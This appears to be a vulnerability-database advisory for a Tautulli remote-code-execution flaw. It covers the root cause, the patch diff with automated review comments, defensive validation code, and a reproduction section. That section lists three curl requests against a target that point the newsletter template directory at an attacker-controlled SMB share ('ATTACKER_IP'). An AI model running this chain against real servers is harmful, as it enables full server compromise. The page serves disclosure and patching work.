VYPR
High severity · NVD Advisory · Published Jun 4, 2026 · Updated Jun 4, 2026

CVE-2026-41065

Description

Tautulli versions before 2.17.1 allow unauthenticated or admin RCE via a malicious Mako template on an SMB share.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Tautulli versions prior to 2.17.1 are vulnerable to remote code execution through the newsletter custom template directory feature. This vulnerability exists due to missing authentication on fresh installs before the setup wizard is completed, and unsanitized input for the newsletter custom template directory. The affected versions are all versions prior to 2.17.1 [1].

Exploitation

An attacker can create a newsletter agent and configure the custom template directory to point to an attacker-controlled SMB share that hosts a malicious Mako template. By triggering the newsletter render endpoint, the attacker can achieve code execution. On a fresh install, this can be done without any credentials. On an already configured install, any administrator can be targeted [1].

Impact

Successful exploitation allows an attacker to execute arbitrary Python code on the target system with the privileges of the Tautulli process. This can lead to a full compromise of the affected server [1].

Mitigation

Version 2.17.1, released on 2026-05-04, addresses this vulnerability [2]. Users should update to version 2.17.1 or later. For custom newsletter templates and scripts, using mounted folders now requires manually enabling allow_mounted_folders = 1 in the config file [2].

AI Insight generated on Jun 4, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

  • Tautulli/Tautulli (2 version entries, no CPE assigned): range <2.17.1

Patches

Commit b24ff45af531: Fix password newsletter auth
https://github.com/tautulli/tautulli · JonnyWong16 · Apr 26, 2026 · Fixed in 2.17.1 (via llm-release-walk)
3 files changed · +7 −6
  • data/interfaces/default/newsletter_auth.html (+1 −1, modified)
    @@ -30,7 +30,7 @@
                     </div>
                     <div class="row">
                         <div class="col-sm-6 col-sm-offset-3">
    -                        <form action="${uri}" method="post" id="newsletter-form">
    +                        <form action="${uri}" method="get" id="newsletter-form">
                                 <div class="form-group">
                                     <label for="password" class="control-label">
                                         Password
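Review bot: the `<form action="${uri}" method="get" id="newsletter-form">` change moves the password field into the query string, so the newsletter password will appear in browser history, in Referer headers sent to any linked resource, and in every access log that records request URLs; the commit message gives no reason for leaving POST. If the session tooling switched on in webstart.py needs a GET here, say so in the commit and make sure the `key` parameter is scrubbed from logging; otherwise keep `method="post"`.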
    
  • plexpy/webserve.py (+2 −1, modified)
    @@ -17,6 +17,7 @@
     
     import base64
     import csv
    +from hmac import compare_digest
     from io import open, BytesIO
     import json
     import linecache
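Review bot: style point: every other line in this import block is a plain `import module` statement and `from hmac import compare_digest` is the one from-import. Its sorted position between csv and io is fine, but `import hmac` with `hmac.compare_digest(...)` at the call site would match the block's convention and make the constant-time intent visible where it is used.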
    @@ -6837,7 +6838,7 @@ def newsletter(self, *args, **kwargs):
             elif plexpy.CONFIG.NEWSLETTER_AUTH == 1 and plexpy.CONFIG.NEWSLETTER_PASSWORD:
                 if len(args) >= 2 and args[0] == 'image':
                     return self.newsletter_auth(*args, **kwargs)
    -            elif kwargs.pop('key', None) == plexpy.CONFIG.NEWSLETTER_PASSWORD:
    +            elif compare_digest(kwargs.pop('key', ''), plexpy.CONFIG.NEWSLETTER_PASSWORD):
                     return self.newsletter_auth(*args, **kwargs)
                 else:
                     return serve_template(template_name="newsletter_auth.html",
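Review bot: `compare_digest(kwargs.pop('key', ''), plexpy.CONFIG.NEWSLETTER_PASSWORD)` raises TypeError instead of returning False in two cases the old `==` tolerated: when either string contains a non-ASCII character (compare_digest on str accepts ASCII only), and when `key` is not a str at all, which happens when the parameter is sent twice and arrives as a list. Both turn a wrong password into an unhandled error from the newsletter handler instead of the `newsletter_auth.html` page. Reject non-str input and compare bytes, e.g. `key = kwargs.pop('key', '')` followed by `elif isinstance(key, str) and compare_digest(key.encode('utf-8'), plexpy.CONFIG.NEWSLETTER_PASSWORD.encode('utf-8')):`.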
    
  • plexpy/webstart.py (+4 −4, modified)
    @@ -179,19 +179,19 @@ def initialize(options):
             },
             '/api': {
                 'tools.auth_basic.on': False,
    -            'tools.sessions.on': False,
    +            'tools.sessions.on': True,
             },
             '/status': {
                 'tools.auth_basic.on': False,
    -            'tools.sessions.on': False,
    +            'tools.sessions.on': True,
             },
             '/newsletter': {
                 'tools.auth_basic.on': False,
    -            'tools.sessions.on': False,
    +            'tools.sessions.on': True,
             },
             '/image': {
                 'tools.auth_basic.on': False,
    -            'tools.sessions.on': False,
    +            'tools.sessions.on': True,
             },
             '/interfaces': {
                 'tools.staticdir.on': True,
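Review bot: flipping `'tools.sessions.on'` to True for /api, /status, /newsletter and /image turns on CherryPy session handling for those mount points but does not by itself require a login; `'tools.auth_basic.on': False` is unchanged in every one of the four blocks. Nothing in the three changed files touches `NEWSLETTER_CUSTOM_DIR` validation or adds a `FIRST_RUN_COMPLETE` check, which the advisory names as the root cause. Confirm that the directory sanitisation and the fresh-install gate land in a separate commit, and reference it from this one, or this patch alone closes only the password-comparison half of the issue.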
    

Vulnerability mechanics

Root cause

"Missing authentication on fresh installs and unsanitized Mako template directory input allow for remote code execution."

Attack vector

On a fresh install before the setup wizard is completed, all management endpoints are unauthenticated. An attacker can create a newsletter agent, point the custom template directory to an attacker-controlled SMB share serving a malicious Mako template, and trigger execution via the newsletter render endpoint. On a completed install with credentials configured, the same chain is exploitable by any admin. The attacker hosts a malicious Mako template on an SMB share and crafts three requests to create the agent, set the custom template directory, and then render the newsletter to achieve code execution [ref_id=1].

Affected code

The vulnerability stems from `plexpy/webstart.py` which disables authentication on fresh installs, `plexpy/newsletters.py` where `NEWSLETTER_CUSTOM_DIR` is unsanitized and passed to `TemplateLookup`, and `plexpy/webserve.py` which lacks a `FIRST_RUN_COMPLETE` check on relevant endpoints [ref_id=1].
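The unsanitized `NEWSLETTER_CUSTOM_DIR` described above and the `allow_mounted_folders` gate that 2.17.1 introduces come down to one question: should this user-supplied directory ever reach Mako's `TemplateLookup`? The following is an added example, not Tautulli's code, of a guard that answers it: UNC paths and anything that resolves outside an allow-listed root are refused unless mounted folders are explicitly enabled, with symlinks and `..` segments resolved before the check. The function and exception names, the exact policy and the sample directory tree are assumptions made for illustration; how Tautulli itself implements the `allow_mounted_folders` check is not shown on this page.

```python
"""
Added example, not Tautulli's code: a policy check for a user-supplied
custom template directory, run before the path is handed to Mako's
TemplateLookup. Names, the exact policy and the sample tree are
assumptions made for illustration.
"""
from pathlib import Path
import tempfile


class TemplateDirError(ValueError):
    """Raised when a candidate template directory fails the policy."""


def is_unc_path(raw: str) -> bool:
    # Windows UNC syntax (\\host\share) and its forward-slash spelling.
    return raw.startswith(("\\\\", "//"))


def validate_template_dir(raw: str, allowed_root: str,
                          allow_mounted_folders: bool = False) -> Path:
    """Return the resolved directory if it passes policy, else raise.

    Policy (hypothetical, modelled on the allow_mounted_folders gate):
      * UNC paths are refused unless mounted folders are allowed;
      * the path must exist and be a directory;
      * unless mounted folders are allowed, it must resolve (symlinks
        followed, '..' collapsed) to somewhere inside allowed_root.
    """
    if not raw or not raw.strip():
        raise TemplateDirError("empty template directory")
    if is_unc_path(raw) and not allow_mounted_folders:
        raise TemplateDirError(
            "network (UNC) paths are disabled; allow_mounted_folders is off")
    root = Path(allowed_root).resolve(strict=True)
    try:
        candidate = Path(raw).expanduser().resolve(strict=True)
    except OSError as exc:  # missing path, dangling symlink, unreachable host
        raise TemplateDirError(f"{raw!r} cannot be resolved: {exc}") from exc
    if not candidate.is_dir():
        raise TemplateDirError(f"{raw!r} is not a directory")
    if not allow_mounted_folders and root not in (candidate, *candidate.parents):
        raise TemplateDirError(f"{raw!r} resolves outside {root}")
    return candidate


def demo() -> dict:
    """Exercise the validator on a throwaway tree; returns case -> verdict."""
    base = Path(tempfile.mkdtemp(prefix="tpl-guard-example-"))
    root = base / "data"                   # stands in for the app data dir
    (root / "newsletters").mkdir(parents=True)
    outside = base / "outside"             # a directory the app must not use
    outside.mkdir()
    escape = root / "escape"               # symlink inside root -> outside
    try:
        escape.symlink_to(outside, target_is_directory=True)
    except OSError:                        # symlinks unavailable on this host
        escape = None

    def verdict(raw: str, **kw) -> str:
        try:
            validate_template_dir(raw, str(root), **kw)
            return "accepted"
        except TemplateDirError:
            return "rejected"

    return {
        "inside_root": verdict(str(root / "newsletters")),
        # constructed UNC target, the shape the advisory's attack path uses
        "unc_share": verdict(r"\\fileserver.example\share"),
        "outside_root": verdict(str(outside)),
        "outside_root_mounts_allowed": verdict(str(outside), allow_mounted_folders=True),
        "dot_dot_escape": verdict(str(root / "newsletters" / ".." / ".." / "outside")),
        "symlink_escape": verdict(str(escape)) if escape else "rejected",
    }


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case:30} {outcome}")
```

`resolve(strict=True)` is what makes the `..` and symlink cases fail: the comparison is done on the real filesystem location, not on the string the user typed. With `allow_mounted_folders=True` only the existence and is-a-directory checks remain, which mirrors the opt-in the release notes describe.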

What the fix does

The patch enforces session authentication for the newsletter endpoint, preventing unauthenticated access. It also strengthens the password comparison for newsletter authentication using `compare_digest` and modifies the newsletter form submission to use GET instead of POST, addressing the authentication and template rendering vulnerabilities [patch_id=4820255].
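The `compare_digest` change removes the early-exit timing difference of a plain `==` comparison, but `hmac.compare_digest` has edge cases of its own that the patched line does not handle. The following is an added example, not Tautulli's code: a wrapper (`keys_match` and `compare_digest_verdict` are hypothetical names) that encodes both sides to bytes so non-ASCII passwords work, and treats a non-string request parameter as a failed check rather than an exception.

```python
"""
Added example, not Tautulli's code: a wrapper around hmac.compare_digest
for a password/key check. keys_match and compare_digest_verdict are
hypothetical names chosen here.
"""
from hmac import compare_digest


def keys_match(supplied, expected: str) -> bool:
    """Constant-time check of a request parameter against the configured key.

    * A non-str parameter (a query value sent twice can arrive as a list)
      is a failed check, not an exception.
    * An empty configured key never matches, so an unset password cannot
      be satisfied by sending key= with no value.
    * Both sides are encoded to bytes: compare_digest on str objects only
      accepts ASCII, so a non-ASCII password would raise TypeError.
    """
    if not isinstance(supplied, str) or not expected:
        return False
    return compare_digest(supplied.encode("utf-8"), expected.encode("utf-8"))


def compare_digest_verdict(a, b):
    """Call compare_digest directly; return its result, or the exception
    name when it raises. Shows the edge cases the wrapper absorbs."""
    try:
        return compare_digest(a, b)
    except TypeError:
        return "TypeError"


if __name__ == "__main__":
    print(keys_match("s3cret", "s3cret"))                  # True
    print(keys_match("pässwörd", "pässwörd"))              # True
    print(keys_match(["s3cret", "s3cret"], "s3cret"))      # False
    print(compare_digest_verdict("pässwörd", "pässwörd"))  # TypeError
    print(compare_digest_verdict(["s3cret"], "s3cret"))    # TypeError
```

The bytes encoding is the important part: an operator who sets a password containing an accented character would otherwise get an error on every newsletter login rather than a constant-time match.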

Preconditions

  • config: Tautulli must be installed and running.
  • auth: On a fresh install, no authentication is required. On a completed install, administrative privileges are required.
  • network: The attacker must be able to reach the Tautulli instance over the network.
  • input: The attacker must control an SMB share serving a malicious Mako template.

Reproduction

Attacker hosts a malicious Mako template on an SMB share, then [ref_id=1]:

  1. Create a newsletter agent: `curl -s -X POST "http://TARGET:8181/add_newsletter_config" -d "agent_id=0"`
  2. Set the custom template directory to the attacker's SMB share: `curl -s -X POST "http://TARGET:8181/configUpdate" -d "newsletter_custom_dir=\\ATTACKER_IP\share"`
  3. Render the newsletter using the returned newsletter_id: `curl -s "http://TARGET:8181/real_newsletter?newsletter_id=X"`

Generated on Jun 4, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References (2)